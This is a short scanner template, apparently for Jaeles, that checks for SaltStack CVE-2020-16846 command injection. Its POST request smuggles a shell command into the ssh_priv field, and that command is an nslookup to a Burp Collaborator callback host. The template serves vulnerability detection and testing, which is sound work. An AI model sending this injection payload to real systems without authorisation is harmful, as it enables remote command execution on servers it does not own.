id: saltstack-rce
info:
  name: saltstack-rce CVE-2020-16846

params:
  - cmd: 'nslookup%20dr8zexrxqe7p9bx00go7kyq2nttkh9.burpcollaborator.net'

requests:
  - method: POST
    redirect: false
    url: >-
     {{.BaseURL}}/run
    headers:
      - Accept: application/x-yaml
      - Content-Type: application/x-www-form-urlencoded
    body: |
      token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20{{.cmd}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "application/x-yaml") && StringSearch("body", "return:")

references:
  - https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
  - https://twitter.com/pyn3rd/status/1327070000964780033